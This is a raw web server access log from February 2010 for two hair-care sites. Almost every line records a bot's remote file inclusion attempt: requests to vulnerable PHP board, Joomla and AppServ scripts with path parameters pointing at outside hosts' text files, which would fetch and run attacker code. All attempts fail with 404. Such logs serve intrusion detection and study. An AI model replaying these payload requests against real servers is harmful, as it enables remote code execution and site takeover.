218.55.227.145 - - [15/Feb/2010:04:29:17 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.145 - - [15/Feb/2010:04:29:42 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.145 - - [15/Feb/2010:04:29:42 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.145 - - [15/Feb/2010:04:29:43 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.78.112.81 - - [15/Feb/2010:04:30:23 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.78.112.81 - - [15/Feb/2010:04:30:23 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.78.112.81 - - [15/Feb/2010:04:30:23 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:31:18 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:31:18 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:31:18 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:31:18 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.161.133.1 - - [15/Feb/2010:04:31:18 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.161.133.1 - - [15/Feb/2010:04:31:18 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:04:32:41 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:04:32:41 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "growlonghairfast.com"
67.195.113.253 - - [15/Feb/2010:04:34:18 -0800] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
69.161.133.1 - - [15/Feb/2010:04:34:45 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:34:45 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:34:45 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:34:50 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.161.133.1 - - [15/Feb/2010:04:34:50 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.161.133.1 - - [15/Feb/2010:04:34:50 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.145 - - [15/Feb/2010:04:35:25 -0800] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:36:54 -0800] "GET /logs/access_100125.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:36:54 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:36:54 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [15/Feb/2010:04:37:28 -0800] "GET /logs/access_100125.log%20%20//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.61.181.34 - - [15/Feb/2010:04:37:43 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.61.181.34 - - [15/Feb/2010:04:37:43 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.61.181.34 - - [15/Feb/2010:04:37:44 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.113.253 - - [15/Feb/2010:04:37:54 -0800] "GET /tmp/?M=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.113.253 - - [15/Feb/2010:04:37:55 -0800] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
220.80.108.81 - - [15/Feb/2010:04:38:10 -0800] "GET /include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:04:38:10 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:04:38:10 -0800] "GET /logs//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:04:38:22 -0800] "GET /logs/access_100111.log%20%20//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:38:24 -0800] "GET /logs/access_100125.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:38:24 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:38:24 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.145 - - [15/Feb/2010:04:38:53 -0800] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:39:09 -0800] "GET /logs/access_100118.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:39:21 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:39:21 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:39:21 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.136 - - [15/Feb/2010:04:39:40 -0800] "GET /delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.136 - - [15/Feb/2010:04:39:41 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.136 - - [15/Feb/2010:04:39:43 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.136 - - [15/Feb/2010:04:39:43 -0800] "GET /delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.136 - - [15/Feb/2010:04:39:44 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.136 - - [15/Feb/2010:04:39:44 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.145 - - [15/Feb/2010:04:39:49 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:40:12 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:40:12 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:40:12 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.93.149.176 - - [15/Feb/2010:04:40:40 -0800] "GET /logs/access_100118.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.145 - - [15/Feb/2010:04:42:17 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:42:25 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:42:25 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:42:25 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.161.133.1 - - [15/Feb/2010:04:42:46 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.161.133.1 - - [15/Feb/2010:04:42:46 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.161.133.1 - - [15/Feb/2010:04:42:46 -0800] "GET /logs/access_100125.log%20%20/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:49:20 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:49:20 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:49:21 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:50:59 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:50:59 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:50:59 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.61.181.34 - - [15/Feb/2010:04:51:31 -0800] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [15/Feb/2010:04:52:19 -0800] "GET /logs/access_100125.log//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [15/Feb/2010:04:52:21 -0800] "GET /logs/access.log//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:54:17 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:54:56 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.36.1.51 - - [15/Feb/2010:04:55:37 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.78.112.81 - - [15/Feb/2010:04:56:00 -0800] "GET /logs/access_100125.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.78.112.81 - - [15/Feb/2010:04:56:00 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.78.112.81 - - [15/Feb/2010:04:56:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.36.1.51 - - [15/Feb/2010:04:56:21 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.61.181.34 - - [15/Feb/2010:04:58:26 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [15/Feb/2010:04:58:48 -0800] "GET /logs/access_090817.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
61.63.82.14 - - [15/Feb/2010:04:59:16 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.63.82.14 - - [15/Feb/2010:04:59:16 -0800] "GET /delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.63.82.14 - - [15/Feb/2010:04:59:21 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.239.230.130 - - [15/Feb/2010:05:05:55 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:05:05:55 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:05:13:00 -0800] "GET /logs/access.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:05:13:00 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:05:13:01 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.239.230.130 - - [15/Feb/2010:05:13:39 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:05:13:39 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:05:14:09 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:05:14:09 -0800] "GET /logs/access.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:05:14:09 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:05:14:37 -0800] "GET /bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:05:14:37 -0800] "GET /logs//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:05:14:37 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.98.144.18 - - [15/Feb/2010:05:15:39 -0800] "GET /logs/access_091228.log//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.98.144.18 - - [15/Feb/2010:05:15:39 -0800] "GET /appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.98.144.18 - - [15/Feb/2010:05:15:39 -0800] "GET /logs//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.98.144.18 - - [15/Feb/2010:05:16:33 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.98.144.18 - - [15/Feb/2010:05:16:33 -0800] "GET /logs//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.98.144.18 - - [15/Feb/2010:05:16:33 -0800] "GET /appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.136 - - [15/Feb/2010:05:20:56 -0800] "GET /delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.136 - - [15/Feb/2010:05:20:56 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.136 - - [15/Feb/2010:05:20:57 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.136 - - [15/Feb/2010:05:21:19 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.136 - - [15/Feb/2010:05:21:19 -0800] "GET /delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.136 - - [15/Feb/2010:05:21:24 -0800] "GET /logs/access_100125.log%20%20/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.98.144.18 - - [15/Feb/2010:05:23:13 -0800] "GET /logs/access_091228.log%20%20//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.98.144.18 - - [15/Feb/2010:05:23:30 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
82.98.144.18 - - [15/Feb/2010:05:24:28 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.172.236.41 - - [15/Feb/2010:05:33:33 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
